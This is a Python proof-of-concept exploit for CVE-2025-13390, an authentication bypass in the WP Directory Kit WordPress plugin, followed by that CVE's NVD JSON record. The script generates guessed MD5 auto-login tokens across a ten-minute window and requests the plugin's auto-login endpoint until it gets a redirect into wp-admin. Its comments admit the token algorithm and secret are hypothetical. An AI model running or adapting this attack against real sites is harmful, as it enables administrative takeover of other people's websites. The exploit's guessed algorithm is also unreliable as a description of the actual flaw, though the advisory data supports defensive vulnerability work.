CVE-2025-13390

# CVE-2025-13390 PoC - WP Directory Kit Authentication Bypass # This PoC demonstrates how to exploit the weak token generation in auto-login function import hashlib import time import requests from datetime import datetime, timedelta TARGET_URL = "https://vulnerable-site.com" PLUGIN_PATH = "/wp-content/plugins/wp-directory-kit/" def generate_predictable_token(user_id, timestamp=None): """ Generate token using the weak algorithm (hypothetical based on CVE description) The actual algorithm may vary, this demonstrates the weak token generation concept """ if timestamp is None: timestamp = int(time.time()) # Weak token generation using predictable values secret = "wdk_secret_key" # Default or known secret token_input = f"{user_id}_{timestamp}_{secret}" token = hashlib.md5(token_input.encode()).hexdigest()[:16] return token, timestamp def exploit_auth_bypass(target_url, admin_user_id=1): """ Exploit the authentication bypass vulnerability """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-13390 - WP Directory Kit Auth Bypass") # Generate predictable tokens for different time windows current_time = int(time.time()) for time_offset in range(-300, 300, 10): # Check 5 minutes before and after timestamp = current_time + time_offset token, _ = generate_predictable_token(admin_user_id, timestamp) # Construct auto-login URL auto_login_url = f"{target_url}{PLUGIN_PATH}wdk-auto-login/?user_id={admin_user_id}&token={token}" print(f"[*] Testing token: {token} (timestamp: {timestamp})") try: response = requests.get(auto_login_url, allow_redirects=False, timeout=10) # Check for successful authentication indicators if response.status_code in [302, 303] and 'wp-admin' in response.headers.get('Location', ''): print(f"[+] SUCCESS! Valid token found: {token}") print(f"[+] Auto-login URL: {auto_login_url}") print(f"[+] Admin access granted!") return auto_login_url elif 'Set-Cookie' in response.headers: print(f"[+] Potential admin cookie obtained") except requests.RequestException as e: print(f"[-] Request failed: {e}") print("[-] No valid token found in time window") return None def main(): """ Main execution function """ print("=" * 60) print("CVE-2025-13390 - WP Directory Kit Authentication Bypass") print("=" * 60) result = exploit_auth_bypass(TARGET_URL, admin_user_id=1) if result: print("\n[!] Vulnerability confirmed!") print(f"[!] Use the URL to gain admin access: {result}") else: print("\n[-] Exploitation failed or token generation algorithm different") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-13390", "sourceIdentifier": "[email protected]", "published": "2025-12-03T14:15:48.280", "lastModified": "2025-12-16T21:17:39.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Directory Kit plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.4 due to incorrect implementation of the authentication algorithm in the \"wdk_generate_auto_login_link\" function. This is due to the feature using a cryptographically weak token generation mechanism. This makes it possible for unauthenticated attackers to gain administrative access and achieve full site takeover via the auto-login endpoint with a predictable token."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-303"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpdirectorykit:wp_directory_kit:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.4.4", "matchCriteriaId": "000C72F0-7DA8-40EC-B33F-6C87223D41EF"}]}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-13390", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://plugins.trac.wordpress.org/changeset/3400599/wpdirectorykit/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://ryankozak.com/posts/cve-2025-13390/", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6598d171-e68c-4d2f-9cd1-f1574fa90433?source=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/d0n601/CVE-2025-13390", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}